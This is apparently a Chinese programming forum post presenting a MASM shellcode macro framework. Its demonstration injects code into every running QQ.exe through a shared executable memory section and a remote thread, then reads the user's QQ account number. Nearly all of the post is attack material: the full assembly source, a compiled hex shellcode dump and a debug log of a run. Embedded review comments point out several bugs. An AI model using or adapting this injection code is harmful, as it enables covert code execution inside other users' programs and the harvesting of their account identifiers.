标题:MAsM ShellCode 宏框架
yibana
MAsM ShellCode 宏框架
下面通过远程注入代码获取QQ号的例子来演示使用方法

代码预览:

代码:
程序代码:
; 32-bit flat/stdcall MASM source. The shellcode macros used below (Import,
; LdrImport, ImportApiCall, BaseRelocations, __GetBuffSize__) are defined in
; myMacro.asm, which is not part of this listing; their expansions can only be
; inferred from the hex dump further down the page.
.386
.model flat, stdcall
option casemap :none

include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
; With DeBug = 1 the framework prints "Debug mode!" and the source text of every
; ImportApiCall through OutputDebugStringA (see the DebugView log below); that
; output is readable by any debug-output listener on the machine.
DeBug = 1 ;debug mode, increases the output size; comment it out for release
; SHELLCODE framework: declare the import tables. Note that nothing here is double-quoted.
; Import <table>, <dll>, <api>[, <api>...] - MyIAT is used by START, injectIAT by
; injectCode; the same table name appears to be continued across several Import lines.
Import  MyIAT,    Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
    CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import  MyIAT,    Kernel32,RtlMoveMemory,OutputDebugStringA
Import  MyIAT,    ntdll,NtMapViewOfSection
Import  MyIAT,    user32,wsprintfA

; injectCode needs only these two; everything else it reaches goes through them.
Import  injectIAT,  Kernel32,GetModuleHandleA,GetProcAddress

; injectCode below is copied elsewhere by START, not executed here, so skip over it.
jmp  START
;-----------------------------------------------------------------------
; injectCode - payload that START copies into the target process (RtlMoveMemory)
; and starts there with CreateRemoteThread; the thread start address is the
; view base, so the routine takes no arguments.
; Out:  eax = return value of KernelUtil.dll!?GetSelfUin@Contact@Util@@YAKXZ,
;       or 0 if the module or export is not found; START reads it back with
;       GetExitCodeThread.
; Imports: resolved at run time from its own table (injectIAT: GetModuleHandleA,
;       GetProcAddress) by LdrImport; the macro expansions live in myMacro.asm.
;-----------------------------------------------------------------------
injectCode proc
; assembly-time message: number of DWORDs the injectIAT buffer needs
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD 
LdrImport injectIAT,APIArrayBuff  ;resolve every API listed in injectIAT into APIArrayBuff
ImportApiCall GetModuleHandleA,"KernelUtil.dll"   ;eax = module handle inside the target, 0 if it is not loaded there
.if eax
  ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ" ;eax = address of the export
  .if  eax
    call  eax ; get qq num, return eax (mangled name decodes to __cdecl unsigned long (void): no args, nothing to clean up)
    ret       ; MASM emits leave/ret here because of the LOCAL above (dump: C9 C3); eax becomes the thread exit code
  .endif
.endif
xor  eax,eax  ; not-found path. NOTE(review): no ret follows - in the dump 33 C0 is immediately followed by
              ; START's prologue 55 8B EC, so a remote thread that reaches here runs off the end of the copied bytes.
injectCode endp
injectCodeEnd:                            ; end marker of the bytes START copies into the target
injectCodelen = injectCodeEnd-injectCode  ; byte length of injectCode (the dump shows push 2E2h for it)
;-----------------------------------------------------------------------
; START - program entry (the jmp START at the top of the file lands here;
; the file's END directive names it).
; Flow as written: create one 4 KiB RWX section, map it into this process
; and copy injectCode into it, then for every process named QQ.exe in a
; Toolhelp32 snapshot map the same section into that process, run it there
; as a remote thread, and print the thread's exit code with
; wsprintfA/OutputDebugStringA. There is no break after a match, so every
; QQ.exe instance is visited (the DebugView log below shows two).
; Locals: APIArrayBuff = resolved MyIAT pointers; info/handle = snapshot
; state; hProcess2 = this process, hProcess1 = the current QQ.exe;
; ViewBase2/ViewBase1 = the section's view in each of them.
; Macros (Import/LdrImport/ImportApiCall/BaseRelocations) come from
; myMacro.asm, which is not shown; their expansion is only visible in the dump.
;-----------------------------------------------------------------------
START proc 
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD   ;API pointer buffer for MyIAT; the constant __APiNumber__ may also be used for its size
LOCAL  info:PROCESSENTRY32
LOCAL  handle:HANDLE
LOCAL   hProcess1:HANDLE,hProcess2:HANDLE
local   hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword
LOCAL hRemoteThread:dword,Return_Value:dword
local @QQUid[16]:BYTE 
; assembly-time message: number of DWORDs the MyIAT buffer needs
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad                          ; save all GP registers; matched by popad before ret
LdrImport MyIAT,APIArrayBuff  ;resolve every API listed in MyIAT into APIArrayBuff
mov  ViewSize,1024*4            ; requested view size, 4 KiB (in/out parameter of NtMapViewOfSection)
; pagefile-backed (INVALID_HANDLE_VALUE) section, 4 KiB, PAGE_EXECUTE_READWRITE -> a writable+executable mapping
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov  hMappedFile,eax            ; NOTE(review): never closed, and the local view is never unmapped, before ret
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax   ;handle to this process (the dump shows 001F0FFFh for PROCESS_ALL_ACCESS)
mov  hProcess2,eax
and  ViewBase2,0 ;must be zero: on Win7 the call fails if this is not cleared (the API treats a non-NULL *BaseAddress as a requested address)
; args: Section, Process, *BaseAddress, ZeroBits, CommitSize, SectionOffset, *ViewSize, InheritDisposition (1), AllocationType, Win32Protect
; maps the RWX section into this process; eax = NTSTATUS, ViewBase2 = where it landed
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0 ;NTSTATUS success check. NOTE(review): eax is untyped, so MASM emits an UNSIGNED compare - the dump shows 83 F8 00 0F 82 = cmp eax,0 / jb, which never branches - so a negative (failure) status still enters this block. Same at the second NtMapViewOfSection below.
  BaseRelocations eax                ; per the dump this expands to a call/pop that yields the load delta of this image in eax
  lea  eax,[offset injectCode + eax] ;don't forget relocation: eax = run-time address of injectCode
  mov  radr,eax
  ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen   ;copy injectCode into the local view; the target's view of the same section sees the same bytes
  ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;process snapshot
  mov    handle,eax
  mov    info.dwSize,sizeof PROCESSENTRY32                   ;required before Process32First
  ImportApiCall Process32First,handle,addr info              ;NOTE(review): return value not checked before entering the loop
  .repeat
    ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ;is this the process name we are looking for? (case-insensitive)
    .if !eax                                             ;lstrcmpiA returns 0 on match
    ImportApiCall OpenProcess,4095, 0,info.th32ProcessID ;4095 = 0FFFh: process-specific rights only (no STANDARD_RIGHTS_REQUIRED/SYNCHRONIZE), a different mask than the PROCESS_ALL_ACCESS used for hProcess2 above
       .if eax
       mov  hProcess1,eax
       and  ViewBase1,0                                  ;same zeroing requirement as ViewBase2
       mov  ViewSize,1024*4                              ;re-arm: the first NtMapViewOfSection may have rewritten ViewSize
       ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
  
         .if eax>=0                                      ;same unsigned-compare caveat as above: always taken
         ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0   ;start address = the target's view of the section, no parameter
           .if eax
             mov  hRemoteThread,eax
             ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE    ;blocks for good if the remote thread never exits
             ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value ;Return_Value = eax left by injectCode
             push  esi
             mov  esi,esp                                ;wsprintfA is cdecl: remember esp so the variadic args can be dropped afterwards
             ; NOTE(review): @QQUid is 16 bytes but the dump shows an 11-byte prefix (BB F1 C8 A1 B5 BD 51 51 BA C5 3A);
             ; with a 10-digit value as in the log below that is 11 + 10 + NUL = 22 bytes, overrunning into the adjacent locals.
             ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
             ImportApiCall OutputDebugStringA,addr @QQUid ;emits "Got QQ number:<n>"; visible to any debug-output listener
             mov  esp,esi                                ;discard wsprintfA's arguments
             pop  esi
             ImportApiCall CloseHandle,hRemoteThread
           .endif
         .endif
        ImportApiCall CloseHandle,hProcess1
       .endif  
    
    .endif
    ImportApiCall Process32Next,handle,addr info
  .until !eax                                            ;loop while Process32Next keeps returning non-zero
  ImportApiCall CloseHandle,handle
.endif
  ImportApiCall CloseHandle,hProcess2
  

popad                           ; restore the registers saved on entry
ret                             ; MASM emits leave/ret (dump: 61 C9 C3)
START endp  
end START

下面是调试输出模式的shellcode:
代码:
E9 E2 02 00 00 55 8B EC 83 C4 F8 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3

调试输出信息,请用debugview查看:

00000004  10.53667545  [5112] Debug mode!  
00000005  10.53904152  [5112] MyIAT:CreateFileMappingA   (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)  
00000006  10.53908825  [5112] MyIAT:GetCurrentProcessId   ()  
00000007  10.53913784  [5112] MyIAT:OpenProcess   (PROCESS_ALL_ACCESS,FALSE,eax)  
00000008  10.53917313  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000009  10.53923798  [5112] MyIAT:RtlMoveMemory   (ViewBase2,radr,injectCodelen)  
00000010  10.53926563  [5112] MyIAT:CreateToolhelp32Snapshot   (TH32CS_SNAPPROCESS,0)  
00000011  10.54169750  [5112] MyIAT:Process32First   (handle,addr info)  
00000012  10.54172421  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000013  10.54194260  [5112] MyIAT:Process32Next   (handle,addr info)  
00000014  10.54199123  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000015  10.54202461  [5112] MyIAT:Process32Next   (handle,addr info)  
00000016  10.54206276  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000017  10.54209423  [5112] MyIAT:Process32Next   (handle,addr info)  
00000018  10.54213047  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000019  10.54216290  [5112] MyIAT:Process32Next   (handle,addr info)  
00000020  10.54220104  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000021  10.54223156  [5112] MyIAT:Process32Next   (handle,addr info)  
00000022  10.54226780  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000023  10.54229736  [5112] MyIAT:Process32Next   (handle,addr info)  
00000024  10.54233360  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000025  10.54236412  [5112] MyIAT:Process32Next   (handle,addr info)  
00000026  10.54240036  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000027  10.54243088  [5112] MyIAT:Process32Next   (handle,addr info)  
00000028  10.54246712  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000029  10.54249859  [5112] MyIAT:Process32Next   (handle,addr info)  
00000030  10.54253387  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000031  10.54256439  [5112] MyIAT:Process32Next   (handle,addr info)  
00000032  10.54260063  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000033  10.54263020  [5112] MyIAT:Process32Next   (handle,addr info)  
00000034  10.54266548  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000035  10.54269600  [5112] MyIAT:Process32Next   (handle,addr info)  
00000036  10.54273129  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000037  10.54276276  [5112] MyIAT:Process32Next   (handle,addr info)  
00000038  10.54279709  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000039  10.54282856  [5112] MyIAT:Process32Next   (handle,addr info)  
00000040  10.54286480  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000041  10.54293251  [5112] MyIAT:Process32Next   (handle,addr info)  
00000042  10.54296970  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000043  10.54300022  [5112] MyIAT:Process32Next   (handle,addr info)  
00000044  10.54304123  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000045  10.54307461  [5112] MyIAT:Process32Next   (handle,addr info)  
00000046  10.54310989  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000047  10.54313946  [5112] MyIAT:Process32Next   (handle,addr info)  
00000048  10.54317570  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000049  10.54320717  [5112] MyIAT:Process32Next   (handle,addr info)  
00000050  10.54324436  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000051  10.54327393  [5112] MyIAT:Process32Next   (handle,addr info)  
00000052  10.54330921  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000053  10.54333973  [5112] MyIAT:Process32Next   (handle,addr info)  
00000054  10.54337502  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000055  10.54340553  [5112] MyIAT:Process32Next   (handle,addr info)  
00000056  10.54344177  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000057  10.54347229  [5112] MyIAT:Process32Next   (handle,addr info)  
00000058  10.54350662  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000059  10.54353809  [5112] MyIAT:Process32Next   (handle,addr info)  
00000060  10.54357433  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000061  10.54360485  [5112] MyIAT:Process32Next   (handle,addr info)  
00000062  10.54364014  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000063  10.54367065  [5112] MyIAT:Process32Next   (handle,addr info)  
00000064  10.54370689  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000065  10.54373550  [5112] MyIAT:Process32Next   (handle,addr info)  
00000066  10.54377079  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000067  10.54380226  [5112] MyIAT:Process32Next   (handle,addr info)  
00000068  10.54383755  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000069  10.54386806  [5112] MyIAT:Process32Next   (handle,addr info)  
00000070  10.54390335  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
